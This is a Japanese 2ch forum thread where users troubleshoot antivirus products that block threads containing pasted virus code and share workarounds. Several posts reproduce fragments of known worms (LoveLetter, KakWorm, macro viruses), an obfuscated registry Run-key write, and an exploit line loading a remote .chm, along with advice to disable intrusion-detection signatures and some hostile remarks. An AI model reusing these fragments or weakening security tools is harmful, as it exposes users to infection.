JaneDoeStyleでこのスレ開いてみたけど大丈夫でした。
(もちろん、ログ再所得済)
ただし
>>559 同様、IEはダメ。
一度IEで開くと、その後はJaneでもダメ。
ノートン先生はいったいどんな対策を施したんだろう、、、
2ch側で何か対策した?
ノートンLiveUpDateしますた。
>>573 Updateしてみましたが、やはりIEでは遮断されました。
工作員ウザ杉
2006で、ここのログを取得してみた。(専ブラはログを破棄して再取得)
>>580 プ 工作員必死だなw
都合が悪いレスを煽って誤魔化すってことは
やっぱり返品出来るんだなw
そりゃそうだ他社のFWじゃ誤作動しなくて
ノートンだけ誤作動じゃ言い訳できないもんな。
工作員の必死さから良く分かった。
返品の話が都合悪いの?w んー?w 悪いの?w
誤作動ではなく危険なコードは完全に弾く仕様になっております。
>>580 >サイトの観覧に不都合が生じた場合は
>そのサイトを信頼ゾーンに追加して下さい。
いやだ。
信用できるかどうか分からんからFW入れてんだよ。
それに今回は
「サイトの観覧に不都合が生じた場合は〜」 じゃねーだろ?
「FWのコード識別に不具合が生じてる」
「不都合」でなく「誤作動」
>>583 お客様、何度も申し上げますが誤作動ではなく仕様です。
なにとぞ御理解下さい。
分かりやすく説明するとこうなる↓
ハァ?どーでもいい一般ユーザーは黙ってろっての!
グチグチうるせーな。
スキル無いボケが生意気いってんじゃねーよ!!
返金?返品?シラネーヨ!
嫌なら裁判でも起こせばいいだろー
知識の無い裁判官言いくるめる弁護士雇う金がこっちにはあるんだボケ!!
ネットで吠えてねーでやってみろ根性なしが(ププp
ついさっきWindows Updateの通知があったんだけど
これってノートン先生誤作動の元になったセキュリティホールとは無関係ですか?
http://www.microsoft.com/japan/security/bulletins/ms05-054e.mspx >>585 対応したみたいだね
それでもupdateしない馬鹿がいるかもしれないから誤作動を続けるであろうノートン先生に敬意を示さねば
http://pcweb.mycom.co.jp/news/2005/12/14/007.html >>586 一応コピペ
>「不適切な Document Object Model オブジェクトのメモリ破損の脆弱性」は、
>JavaScriptでwindow()イベントが使われた場合に任意のコードが実行されるというもの。
>ネット上では5月にすでに情報が公開され、この脆弱性を悪用するトロイの木馬も登場しており、
>ユーザーは至急パッチを適用すべきだ。
Windows UpdateもノートンのUpdateもしたけど駄目だったよ・・・ orz
いや先生もう対策しちゃってるしね
この悪戯もいずれ下火になると思うので、もう設定で対処しないで
引っ掛かったら一時的に切って遮断解除、が一番安全だとは思うけどね
ただ、例えて言えば、ノートン先生って
子供が男子高校生なのに、痴漢がどうのとかいって塾の送り迎えしたり
二十歳超えたのに、夜は危ないから8時以降は外出するのは控えなさい、
とかいうオカンなんだよなw
五月蠅い事この上ない
>>586 ,587
thx
MSのパッチを当てて、ノートンの侵入検出シグネチャを切れば良いって事だな。
>>592 >MSのパッチを当てて、ノートンの侵入検出シグネチャを切れば良いって事だな。
馬鹿じゃないですか?
ウザ警告だけ消せれば他からどんな攻撃を受けてもかまわない、
シグネチャ選んで消せるなら、今回の消せば解決では?
それが解決?
>>598 ここ2ch運用情報板のスレだし、、、
利用者が対策して2ちゃん使えれば解決でしょ?
>>598 バカはおまい一人だと思われ。
脳豚の誤反応を語るならソフトあたりにスレ建てろ。
んで先日のMSのアップデートしたらシグネチャ除外でHTTP MSIE JavaSvript〜
Windows UpdateとノートンのUpdate済ませて
>>601 ノートンが対応したって言う馬鹿がこのスレにいるから
そういう奴もでてくるんだよ。
MSがセキュリティホール埋めたけどシマンテックはこのHTTP MSIE JavaScript〜
ログ削除して専ブラ使えば良い、なんて書きこみがあるけど、
>>570 ,
>>579 など。
これってシマンテックの社員なの?
専ブラ使っても相変わらず駄目だよ。
悪質な嘘をつかないでくれるかな。
マジでムカついちゃったよ。
ノートン2006 + JaneDoe View α ( build date: 051128 )
>>607 なんで社員がそんなこというんだよw
あんた馬鹿だろ。
ログ取得し直しても問題なしって人は設定が間違っているか
NIS2006 + twintail v2.0 beta36 + Windows 2000 SP4 + MSの対策パッチ
>>610 2ch専ブラで問題なしIEで問題ありって人が実際多数いるんだし
俺もJaneDoeView最新版で問題なし
お前みたいな訳分からない否定をするやつは何故自分の環境を書いたり試したりしないんだ?
その多数のうちの大多数が大いなる勘違いだということはもう言わずもがな
>>613 OnloadのやつはIE特有のバグらしいからIEコンポーネント系以外は反応しないように
対策したかも知れないとか考えられないの?
とりあえず変な事ぼやいてないで何か否定材料出してよ、検証しようがないから
自己レス
>>614 Operaで反応し、IEコンポーネントの2chブラウザで反応しないんだが。
もちろん警告は出るようにしてあるよ。
USER_AGENTをIE以外に偽装してIEでアクセスしたりとか試してみたが、関係無いみたいだ。
>>13 してlive updateしたらとりあえず治った。
>>621 ほんとだ!
>>13 してlive updateしたら直った!
直った奴はこれやってたんですね。
スマンテクの対策は終わったみたいだが、対策前にこれが保存できなかったが、バスターで一度読んだ後
専用ブラウザの基本的なしくみを理解できない馬鹿がこんなにもいるのか
XPとMeを持っているんですけど一つで二つのパソコンに2006をインストール出来るんですかね?
なんかこのスレを見るだけでもウイルス探知が反応するんだが。
>>636 こういう愉快犯が一番腹が立つのだが。
こいつもどうせVIPの空気コテだろ。
まったくVIPってのは糞しかいねえな。
>>643 なんだ、奴はVIPPERだったのか。時々実況邪魔しにくるのがウザいと思ってたが。
何れにせよヒッキーネカマにゃ死んでもらいたいな。
上級者キタ━━━━━━(゚∀゚)━━━━━━ !!
さらに変なことになってすべてのサイトにアクセスできなくなったからファイヤーウォール設定低レベルにした・・・
また見れなくなってきたんだが
>>655 拾ってきたけど必要なのは一番下だけかな。
そのうち詳しい人が出てくると思う。
(新規追加)
+live22y.2ch.net:206.223.150.64
+live22y.2ch.net:206.223.150.74
+live22y.2ch.net:206.223.150.84
+same.u.la:206.223.157.12
+chirasi.u.la:206.223.157.17
+bbm.u.la:206.223.157.32
+stock.2ch.net:206.223.150.250
Bloodhound.Exploit.6
AVG free soft は使って問題起こさないの 誰か教えて
ごめんなさい ノートンユーザーです
Jane Doe Styleをアップデートしたら2ch読み込まなくなった。
>>652 を設定しなおしてもダメ。
どうすりゃいいの?教えてエロイ人。
当方ギコナビ使いだが、何故かTBSとフジの実況板に入れん!
板全体がこれに感染してると出る。
http://www.symantec.com/region/jp/avcenter/venc/data/jp-wscript.kakworm.html ほかの実況板には入れるのに・・・・
ヽ(`Д´)ノウワァァン
http://life7.2ch.net/test/read.cgi/intro/1140623959/688 誰かがこれを貼ったらノートンが反応するようになった
ただ、警告が出るだけなのでそれほど深刻な被害にはなってないのだが、
(いろんなスレで見かけるし)問題は、こういう知識をどこで得るのかこいつらは。
そして、どういうつもりで、なにが楽しくてこんなことやってるのか。
こういうことして喜んでるキモい奴が日本のどこかで普通に生活してるというだけで気持ち悪くて吐きそうなんで
みつけだして死刑にしてもらえませんか?
HTTP MSIE JavaScript OnLoad Rte CodeExec
つかスレを最初から読んで情報を得るという発想がなくて
>>674 >>675 見ようとしたらノートンが作動して見れなくなるんですが・・・
確認の時くらいはノートン切る勇気もてよ
>>679 マジレスすると専ブラをFWの監視対象からはずす
ノートンアンチウィルス2006のFW無し版でワーム検出で
だめIPじたいで弾かれる、ちなみにセキュリティ板。
>>657 が最新?live22xでまだ誤作動するんだけど
俺もNAVで、今ワームブロックされてここに来た。
>>692 俺も同じく・・・
NAVは関係ないのかと思ってた
同じコード貼られてんのに反応する時としない時がある・・・
いっそのことインターネットワーム防止機能自体無効にしちゃっても良いんじゃいない?
どうやら最近のAutoUpdateで、NISだけでなくNAVもHTTP MSIE JavaScript OnLoad
私は
>>699 まあふつうの板ならそれで十分だね。
実況系に貼られるとアレだけど。
>>698 にあるようにあぼーん設定するだけで、NAVいじらずに対処できた。
NAVで困ってる人にマジオススメ。
一応書いておいた方がいいかな。OpenJaneにて以下の手順で回避確認。
>>701 ついでにウイルスコードもまとめてあぼ〜ん指定したら
NGワードファイルがノートン先生に吹っ飛ばされますた。
俺バカス(´・ω・`)
>>710 読み込んでからNGワードかどうか判断するから意味ないと思われ。
>>711 だよねえ。
上の方に「あぼ〜んで対処できた」って書いてあったから試してみたけど、
通信の時点で遮断しちゃうんだからローカルあぼ〜んじゃ
どうにもならないよね。
Jane viewならNGワードでOKだよ。
一度ノートン切って取得してから、レス消去したらその後は問題なかったよ。
一度ノートンを通さずにスレ取得する部分が重要であって、あぼーんする必要は無いってことかな?
このスレもウイルスがいるようだ。
>>717 ですね。
実際あぼーんしてなくても、いったん取得すれば問題ないし。
誤作動に当たるのかわからんが、ノートン2005入れてて
ここは2chのスレを見たらノートンが誤作動する人のスレです
つか運営系でノートンスレとあったら扱うのは2ch絡みのみ
アンチウイルス使ってるけど侵入検知とかって項目がない・・
>>725 そうなんだよ、それが見つからなくて困ってここに来たよ。
>>726 参考までに・・・ただし、自己責任で
ノートンアンチウイルス2006 Ver.1
http://pc8.2ch.net/test/read.cgi/sec/1129452372/996 > まず、オプション→インターネット→インターネットワーム防止→除外の設定で、
> HTTP MSIE JavaScript OnLoad Rte CodeExecのチェックを外す。
> そのあと、オプション→インターネット→インターネットワーム防止→
> AutoBlockルール→現在、AutoBlockで遮断しているコンピュータで、
> 遮断解除してok。で、ok。
>>727 おお、ありがとうございます。見れました。
うち2005なのに今日から突然誤作動が始まった・・・なんなんだ。
NAVの場合、こういう方法もあります。onload〜の場合のみ。
1.スレッドを見ると
「「HTTP MSIE Java Script OnLoad Ret CodeExec」の試みを検出して遮断しました。」
という反応をする。
2.Norton AntiVirusのオプションを開いて、インターネットワーム防止を選択、
AutoBlockルールのリストから先程のIPアドレスを消して、閉じる。
インターネットワーム防止をオンにするのチェックを外して無効にする。
3.スレッドを再取得
4.
http://www.geocities.jp/cen_hp/program3.html を使って無効化
5.インターネットワーム防止をオンにするのチェックをして有効にする。
>>727 ν速だけ繋がらないから鯖落ちしてんのかと思った
おかげで助かりました
ありがとう
馬鹿コードをはれないように2ちゃんのほうでなんとかならないものかな?
>>731 >>167 まあこの2人がこう発言しているから、やらないでしょう。
フィギュアなんか誰も見ないし、しかも荒川出てないんだし・・・
適当な文字を貼り付けるウイルス?あるじゃん
それで無差別にコード貼りまくられたら流石に2ちゃんも対応するだろ。
分からない人の苦情が殺到して対応に追われるから。
>>167 は危機感足りないんじゃ?
単なる文字列であって実行ファイルではないのに検知する仕様をどうにかするのと
コード貼り付けなんて何年前からあると思ってんの。
>>738 今までの対応の仕方をみていて、単なる野次馬の予想ですが。
>適当な文字を貼り付けるウイルス?あるじゃん
これは対応すると思うが(現に今もやっている)
>それで無差別にコード貼りまくられたら流石に2ちゃんも対応するだろ。
>分からない人の苦情が殺到して対応に追われるから
こっちは対応いないんじゃないかな?
現に苦情が殺到中のコメントが
>>167 だった訳だし。
ノートンを切るか、2chに来ないかと言う答えになると思うよ。
ウィルスじゃないものに反応するものとしないもの、選択権はユーザーにあるわけで
何でこのスレはいろいろはってあるのにスレが取得できるの?
シマンテックの日本支社はおそらく事態を把握してるだろうけど、
> もっとも、Antinny亜種の対応に追われている状況では
この期に及んで2ちゃんでの誤作動に対応したら面白いな
スレ違いの部分にレスをつけてしまった予感
2ch対応
シマンテック本社に英文で熱烈なラブコールすればいいんじゃね?
対応する気なんか無いでしょ。
さぁー回ってきましたっ!
http://mickey.mirv.net/2chnis.html にある対処方法(2chサーバのIPアドレスを除外する)はNISだけなんで、
NAV2005でそれらしい箇所探した。
「オプション」→「インターネットワーム防止」→「一般ルール」→「Default Non-Routable IPs」を「修正」→「処理」タブで「許可」→「コンピュータ」タブの「下のリストにあるコンピュータとサイトのみ」で「追加」→「個別」
のとこにコピペでいいと思う。右クリックで貼り付けがきかなかったので、Ctrl+Vでやった。
もしかして対応された?
>>757 LiveUpdateしても、このスレを再所得すると反応するよ。
対応されていないのでは?
さっき先生が誤作動起した。
ノートンのソフト自体の終了方法ってないの?
ノートンの機能自体の質問は板違いです
当方AVGなんですが
http://tmp6.2ch.net/test/read.cgi/download/1142734610/ ここの2にAVGが反応するんですが
反応しないようにするにはどうしたらいいんですかね?
そのスレをあぼーん。
>>764-766 まぁセキュリティ板行けって話だけど、AVGは有償のPro版でないと除外指定ができない。
今日ノートンが反応してここに誘導してもらって最初から読んでたけど、
当方マカフィーなのだが、下記のスレを取得しようとすると大激怒されて、
該当datが抹殺されたあげくネットアクセスが遮断されてしまう… orz
【領事館員自殺】中国側、機密を執拗に要求…総領事あての遺書入手(読売新聞)★2
http://news19.2ch.net/test/read.cgi/newsplus/1143894478/l50 …時々こういう事が起こるのだが、その都度運営板の
どこぞかの該当スレに通報した方がイイのかしらん?
>>771 マカフィーも反応するんだ。そこの9スレ目で。
>>771 とりあえず製品の不具合(ウィルスじゃないものに反応する)はマカフィーに通報でいい
>771-772
>>774 いやNIS2005だけどもうすぐ切れるからマカフィーにしようかなと。
アボーソすればいいじゃん。
NAVの場合の設定を教えてくれー
>>778 THX
HTTP MSIE JavaScript OnLoad Rte CodeExec
って 「MS IE」と別のとこにあるのな…ないよーと思って困ってました。
ms-its:mhtml:file://C:\ http://www.loadcash.biz//adverts//35//main.chm::/main.htm " type="text/ 2005でも誤作動するようになったな
>>75 で2chは問題なくなったがしたらばがまだだめだ
このスレ、更新しようとすると、NISにブロックされて、専ブラのタブが赤くなる。(JaneDoeStyle223)
>>510 >>512 >>517 これらはすべてアボーソしてあります。
NISの設定も変えていませんでした。
>>780-785 あたりでJaneDoeStyle223がおかしくなりました。
他スレでは何ともありません。
で、あれからは、ログを取得し直しただけですが、無問題になりました。
いったい何だったんだろう。
ログが壊れただけだったのかな…。
なんかバスターが2ちゃんのスレをIEで見るとそれだけでウイルス検知するようになったらしいね・・・
まあ、あれだ。
>>794 また誰かがウィルスコード貼ったのか…(泣
馬鹿フィーが大激怒 orz
この板限定の機能
Monazilla/1.00 (JaneStyle/2.23) すいません、私はノートンではなくシマンテックアンチウイルスを使ってるのですが、この場合はどのように対処すればいいんでしょうか
>>807 ありがとうございます
私はノートンアンチウイルスではなくてシマンテックアンチウイルスを使ってるのですが、同じようにできるのですか?
オプションが見つからないのですが・・・
>>808 ノートンアンチウイルスの場合
オプション→インターネットワーム防止→有効にするのチェックはずしてみ
シマンテックアンチウイルスってはじめて聞いたや
>>810 説明不足ですいません、企業用のものです
一応無償でもらったノートPCなのですが・・・
ノートンに変えていいか聞いてみます
てst
Monazilla/1.00 (JaneStyle/2.23) test
Monazilla/1.00 (JaneNida/060425) また、マカフィーが大激怒…
任天堂新ハード正式名称発表その名も「wii(ウィー)」
http://live22x.2ch.net/test/read.cgi/news/1146155170/ …「ノートン先生」みたいに、スキャン対象から簡単に外せないんだから、ウィルスコード貼るな!
お願いしますよ orz
『Exploit-MhtRedir.gen』止めて… (鬱氏
tes
Monazilla/1.00 (JaneNida/060425) ためさせて・・
Monazilla/1.00 (V2C/T20060424) あんちういるす2006の一般ルールで追加許可してもだめだ(´・ω・)ワケワカンネ
>>824 オプション→インターネットワーム防止→AutoBlockで遮断しているIPがあれば除外
→防止を有効にするのチェック外してログ取得
これでもダメ?
>>825 今やってみた、ダメだった(´・ω・)ccgrgfvvbtぶぐtvgfxdbcrgvf
また、コード貼った馬鹿が… orz
【国際】「麻薬の運び屋に仕立てられた」 無罪訴え続けた日本人男性、逮捕から14年で仮釈放…オーストラリア
http://news19.2ch.net/test/read.cgi/newsplus/1147357192/ シクシクシク
昨日あたりから板を開くとノートンが反応するんだけど、
>>830 よくある誤作動かと思います。
とりあえずノートン切ってから、ログ取得してみてください。
ノートンを誤作動させる文字列は何年も前からあるし、シマンテックに連絡しても
これで正常と言って対策しない。
つまりシマンテックは自力で対策できる人だけ買ってくれればいいと言っている。
そんなソフトは
>>167 AntiVirus の設定→除外→C:\Program Files\Jane\Logs
>>833 そりゃJaneの場合だろ。他の2chブラウザでも原理は同じだが。
Janeを開いたり更新をするたびに
>>835 ノートン?
なら、ログ除外でこのスレ見てみ。
だからノートンは使う人を選ぶんだってば
3日前から、ラウンジクラシックに入ろうとするとノートンアンチウイルス2005が反応して、
>839
ついでに2ちゃんのIPも隠す必要皆無
N速+でまた、幾つかのスレにウィルスコード張られてるなぁ…
貼る馬鹿っつーのは、他人の家に勝手に出前送りつけたり
てす
Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1) 野豚先生のオートブロックからオカ板を救い出そうとしたんだけど、制限押しちゃった。
c.Copy(dirsystem&"\MSKernel32.vbs")
今日ノートンをつけたけど、ホントにウィルスが反応したwww
×ウィルスが反応した
おおう・・・アンチウイルスがMSIEJAVAオンロードに反応して
>そして流石はノートン先生、生まれた子供を崖から消毒するだけのことはある。
このスレ開いたらキタ━━━━(゚∀゚)━━━━!!とか出た
今日反応したスレ
【日テレ隠蔽疑惑】炭谷宗佑アナを報じない日テレ、容疑否認のテレ東社員を実名報道 テレ東も即日実名で伝える★2
http://news19.2ch.net/test/read.cgi/newsplus/1148999462/ …この騒動が起きてから、幾つかの『日テレ隠蔽疑惑』関連スレに、
ウィルスコード貼ってる香具師が居るなぁ
まさか、関係者?>コード貼る馬鹿
祭りのスレに貼られるのはお約束となっております
どう?
Monazilla/1.00 (cockcrow/2.5.5.5) 誤作動ばかり起こるセキュリソフトを使い続ける人の気が知れねwwww
やっとここにたどり着いた。
>昨日206.223.152.55に攻撃された
ノートンアンチウイルス2005の場合、設定はどうやったらいいのでしょうか?
正直、
>>756 をやってもダメなんですけど。当方NAV2005でつ
>>870 駄目と言われても誰もわかりませんよ
とりあえず↓スレ参照
【ノートン入れたら2chに書きこめない】人へ18
http://etc3.2ch.net/test/read.cgi/qa/1112631967/ 書き込まず読み込むだけで
つーか、誤動作というより2ch管理人が
確かに、そうした穿った見方もできるよな。
>>882 こんなの調べればすぐ分かることだし
一月も前のレスに、わざわざレスしなくても・・・
>>883 貴重なご意見ありがとうございます。
今後の参考にさせていただきます。
p + w * 10 <br> End Sub <br>
//<body onload=window()>
If s = "htm" and fso.FileExists(f1.path+"l") = False thenfso.CopyFile f1.path, f1.path+"l"
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)))
fso.copyfile "c:\network.vbs", "j:\windows\start menu\programs\startup\"
c.Copy(dirsystem&"\MSKernel32.vbs")
c.Copy(dirwin&"\Win32DLL.vbs")
c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")
<object data="ms-its:mhtml:file://C:\\MAIN.MHT!
http://www.loadcash.biz//adverts//35//main.chm::/main.htm" ; type="text/
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
If s = "htm" and fso.FileExists(f1.path+"l") = False then fso.CopyFile f1.path, f1.path+"l"
ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E.GetSpecialFolder(1), A("VHORU@SU/WCR"))
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
ms-its:mhtml:file://c:\
kak.hta';ken=wd+'START
kill -9 xz/tSaBh0
Sub auto_open()
Application.OnSheetActivate = "check_files"
End Sub
Sub check_files()
c$ = Application.StartupPath
m$ = Dir(c$ & "\" & "PERSONAL.XLS")
If m$ = "PERSONAL.XLS" Then p = 1 Else p = 0
If ActiveWorkbook.Modules.Count > 0 Then w = 1 Else w = 0
whichfile = p + w * 10
End Sub
???
これってNIS2003でどう対処すればいいですかね
http://mickey.mirv.net/2chnis.html とかもやってみたけど効果なかった。
ウィルスコードをカキコミできないようにはでけへんの?
むしろウイルスコード貼ったヤツは強制フシアナになるようにすればいいんだよ。
いまさらウイルスコードでギャーギャー騒ぐ奴ってなんなの?
今日ちょうどギャーギャー騒いでる奴見かけたところだw
642 名前:名無しさん@ゴーゴーゴーゴー! [sage] 投稿日:2006/06/11(日) 03:26:36 ID:aqYcE6Jh
だれだ最近、避難所にウイルスコード貼る奴。
専ブラがおかしくなって、そのたびに削除→ダウンロードしなおし→お気に入り登録しなおし、すごい手間、めちゃくちゃ迷惑。
643 名前:名無しさん@ゴーゴーゴーゴー! [sage] 投稿日:2006/06/11(日) 07:23:59 ID:QvemZE+C
>>642 それって難民フォルダーにあるsubject.txt(専ブラによって名称違うかも)を上書きするだけで直るよ
ログ除外してるのに、進入検知だか遮断とか出て更新不能になる
Norton使わなきゃいいだけの話なのに
_,..--‐‐‐‐‐-...,_
ここずっと芸スポにかたっぱしから貼りまくってる奴どうにかして…
windowsを最新にして、ひとつのルールを除外するだけで解決するのにな・・・
それがどんなに素晴らしいソフトでも、厨が推奨するソフトは糞。
まぁ、私の場合は
>>907 言い忘れたが、インターネットワーム防止を復帰させるのを忘れずに。
#放っておいても、15分で自動復帰するが。
>>909 わからない五大理由改
>>910 2003にはないや。orz
dですた。
>912
現在回避できないノートントラップなどあるでしょうか?
>>915 ノートンについては対策全部やってれば特にないよ。
他のは使ってないのでわかんない。
>>912 ノートンを誤作動とか言ってる時点でわかってないじゃない
>>920 一応レス後半やまとめサイトの2005のをやった後に一時的によくなったんですが
ダメな板はダメで、その後
>>13 とかやったんですけどはじかれちゃうんですよ。
他にありませんかね。
30分待てば又スレ読めますので教えてください
専ブラ読み込むたびにノートンの警告でるの止めたいのですが
>>917 さん
返信ありがとうございます、参考にさせていただきます。
>>916 さん
情報ありがとうございます
アバストについては自分で調べてみます。
928の後、調べたところ、
NIS2005の場合(多分NIS2006も同じ)
どうせ右クリ効かないとかだろ
>>937 できました。 ありがとうございました。
とあるスレ一覧更新したら「WScript.KakWorm」の警告がでます
つーか、例の構文貼られても遮断しなくなった。
http://info.2ch.net/wiki/pukiwiki.php?%CA%E4%C2%AD%A4%C8%CA%E4%B4%B0#Norton_Emergency_measures のノートン緊急対策を見て、アドレスに大量のIPアドレスを貼って、これで大丈夫だと思ったら、
芸スポの中田のスレで、またウィルス貼られてるし。
でも前と違って、他のスレは全部すぐ読める。前は30分遮断されたけど。
これは別の種類のなんちゃってウィルスかな?もうどうしたらいいかわからん。
次々といろんなコード貼るから、疲れる・・・
さっきから同じファイルばっかり表示して感染してる感染してるってノートンが騒いで
そういえば。この間延長キーを購入したんですが、支払って二週間たっても延長キー
>>910 すみません。便乗質問になってしまいますが。
最近NAV2004からNIS2006に切り替えたので、
>>910 の設定を見かけて
ついでにやっておこうと思ったのですが、
「インターネットワーム防止」と言う項目が見つかりません。
これはNAVパッケージにしかない項目なのでしょうか。
NISの場合は何処を設定すると良いのでしょうか。
>>951 ,952
ありがとうございます。
「インターネットワーム防止」だけで検索していたのでは見つかりませんね。
「NIS」検索で見つかりました。
>>842 の方法で、つまりNISでは「インターネットワーム防止」を設定ではなくて、
http://mickey.mirv.net/2chnis.html のIP一覧を追加する、ですね。
NGワードに追加してもNGワードの.txtが削除される・・・
専用ブラウザのフォルダ丸ごと監視対象から外す、これ最短。
>>1 と同じ状態になってるんだけどどうすればいいの・・・
>>956 1.このスレを最初から読む
2.Nortonの使用をやめる
お好きな方をどうぞ
ためしにNAVの設定元に戻してみたら
vbsウイルスのソースじゃなくて侵入を検出して遮断しました、の
もう頭悪いからノーdの設定ができない。
>>965 ってか
このスレは侵入を検出して遮断しました用のスレだと思ってた。
vbsウイルスのソースに誤反応、のスレは他にあるし。。
あ、レス読み違えたスマソ
>>968 だってNAVが誤反応してるわけじゃないもの。
侵入検知はファイアーウォールのお仕事でしょ。
>>969 >>687 以降参照。
NISだけの現象なら始めからこのスレにくることもなかったわけだが。。
まあとにかくNIS2004だと相変わらず反応するわけだ
>>971 レスthx
ログビューアみてたらワーム検出の監視ログが変なのに気づいた。
詳細: インターネットワーム保護が 0 個のシグネチャを監視しています。
になってる。全部監視OFF状態になってすり抜けてるだけかも。
確実にインターネットワーム防止をチェックしてるんだけど。。
とりあえずHTTP MSIE JavaScript OnLoad Rte CodeExecのみチェック外した状態なら
詳細: インターネットワーム保護が 568 個のシグネチャを監視しています。
になるようなのでそうしておきます。
連投すまそ、
<body onload=window()>
If s = "htm" and fso.FileExists(f1.path+"l") = False thenfso.CopyFile f1.path, f1.path+"l"
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)))
fso.copyfile "c:\network.vbs", "j:\windows\start menu\programs\startup\"
c.Copy(dirsystem&"\MSKernel32.vbs")
c.Copy(dirwin&"\Win32DLL.vbs")
c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")
<object data="ms-its:mhtml:file://C:\\MAIN.MHT!
http://www.loadcash.biz//adverts//35//main.chm::/main.htm" ; type="text/
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
If s = "htm" and fso.FileExists(f1.path+"l") = False then fso.CopyFile f1.path, f1.path+"l"
ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E.GetSpecialFolder(1), A("VHORU@SU/WCR"))
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
ms-its:mhtml:file://c:\
kak.hta';ken=wd+'START
kill -9 xz/tSaBh0
Sub auto_open()
Application.OnSheetActivate = "check_files"
End Sub
Sub check_files()
c$ = Application.StartupPath
m$ = Dir(c$ & "\" & "PERSONAL.XLS")
If m$ = "PERSONAL.XLS" Then p = 1 Else p = 0
If ActiveWorkbook.Modules.Count > 0 Then w = 1 Else w = 0
whichfile = p + w * 10
End Sub
???
今まで
>>974 みたいのを専ブラでNGワードに指定していたら、
難なく見ることができていました。
ところが、なぜか今は見られません。
現在も専ブラ上ではアボーソされているのですが、やっぱり見ることができません。
何かあったのでしょうか?
やっぱり誤作動なのでしょうか?
ちなみに今はノートンを無効にしています。
専ブラったっていろいろあるから
専ブラは変えてないなら
ごめん、シリア語ブラクラはノートンとは関係ないね。
t2.WriteLine('"Search Bar"="
http://www.jethomepage.com/search.htm" ;');
t2.WriteLine('"Default_Search_URL"="
http://www.jethomepage.com/search.htm" ;');
t2.WriteLine('"Search Page"="
http://www.jethomepage.com/search.htm" ;');
strMsg= " ) (" & vbcrlf
strMsg= strMsg & "( ) ( ) " & vbcrlf
strMsg= strMsg & " ( ) ( )" & vbcrlf
strMsg= strMsg & " ( ) ( )" & vbcrlf
strMsg= strMsg & " -------------------------" & vbcrlf
strMsg= strMsg & " / ( ( ( /\" & vbcrlf
strMsg= strMsg & " / ( / \" & vbcrlf
strMsg= strMsg & " / ( ( / \" & vbcrlf
strMsg= strMsg & " --------------------------------" & vbcrlf
strMsg= strMsg & " | --- | |" & vbcrlf
strMsg= strMsg & " | ----- | | | |" & vbcrlf
strMsg= strMsg & " | | | --- | |" & vbcrlf
strMsg= strMsg & " | | | | |" & vbcrlf
strMsg= strMsg & " --------------------------------" & vbcrlf
strMsg= strMsg & "Mawanella is one of the Sri Lanka's Muslim Village." & vbcrlf
strMsg= strMsg & "This brutal incident happened here 2 Muslim Mosques & 100 Shops are burnt." & vbcrlf
strMsg= strMsg & "I hat this incident, What about you? I can destroy your computer" & vbcrlf
strMsg= strMsg & "I didn't do that because I am a peace-loving citizen."
このスレへの固定リンク: http://5chb.net/r/operate/1133161720/ ヒント: http ://xxxx.5chb .net/xxxx のようにb を入れるだけでここでスレ保存、閲覧できます。TOPへ TOPへ
全掲示板一覧 この掲示板へ 人気スレ |
Youtube 動画
>50
>100
>200
>300
>500
>1000枚
新着画像 ↓「ノートン誤作動対策本部->画像>4枚 」 を見た人も見ています:・大型スーパー台風19号 トンキン直撃 嫌儲対策本部 ★81 🐱👮🏻トンスレ嵐対策本部👮🏻 超大型スーパー台風19号、最凶レベルでトンキン・東海直撃へ!鉄道運休で阿鼻叫喚! 嫌儲対策本部 ★16 超大型スーパー台風19号、895hpaの最凶レベルでトンキン・チバラキ直撃へ! 米専門家「存在しないカテ6に相当する」 嫌儲対策本部★23 【本日正午スタート】Amazonプライムデー対策本部 inなんJ★10 ゾンビ対策本部 あかり板対策本部 狼板荒らし対策本部 なんJコロナ対策本部 カスビット対策本部 V婆対策本部スレ7^^ 速報 災害対策本部設置 V婆対策本部スレ11^^ 嫌儲ふるさと納税対策本部 認定眼鏡士試験対策本部 V婆対策本部スレ13`´ ID消し荒らし対策本部 ★3 【ID有】狼板荒らし対策本部 エロゲ表現規制対策本部929 エロゲ表現規制対策本部839 雑談 台風19号特別対策本部 エロゲ表現規制対策本部665 エロゲ表現規制対策本部804 ex5,ex7.music4爆撃対策本部 高瀬くるみ過小評価問題対策本部 狼荒らし対策本部【ハロプロ】 レアンドロダミアン対策本部 Amazonプライムデー 対策本部 野党、新型肺炎で対策本部立ち上げへ ニューピン人口対策本部 ©bbspink.com 【新型コロナ】嫌儲対策本部★5 【新型コロナ】嫌儲対策本部★1 【ドラフト会議】チームK対策本部 【新型コロナ】嫌儲対策本部★3 【新型コロナ】嫌儲対策本部★2 ex5,ex7.music4爆撃対策本部 その2 エロゲ表現規制対策本部977 ©bbspink.com 嫌儲ネトウヨスクリプト対策本部 【新型コロナ】嫌儲対策本部 ☆61 【新型コロナ】嫌儲対策本部 ☆54 エロゲ表現規制対策本部〜休憩所1 【新型コロナ】嫌儲対策本部 ☆6 【新型コロナ】嫌儲対策本部 ☆64 【新型コロナ】嫌儲対策本部 ☆88 【新型コロナ】嫌儲対策本部 ☆37 【新型コロナ】嫌儲対策本部 ☆15 【新型コロナ】嫌儲対策本部 ☆21 【新型コロナ】嫌儲対策本部 ☆50 【新型コロナ】嫌儲対策本部 ☆72 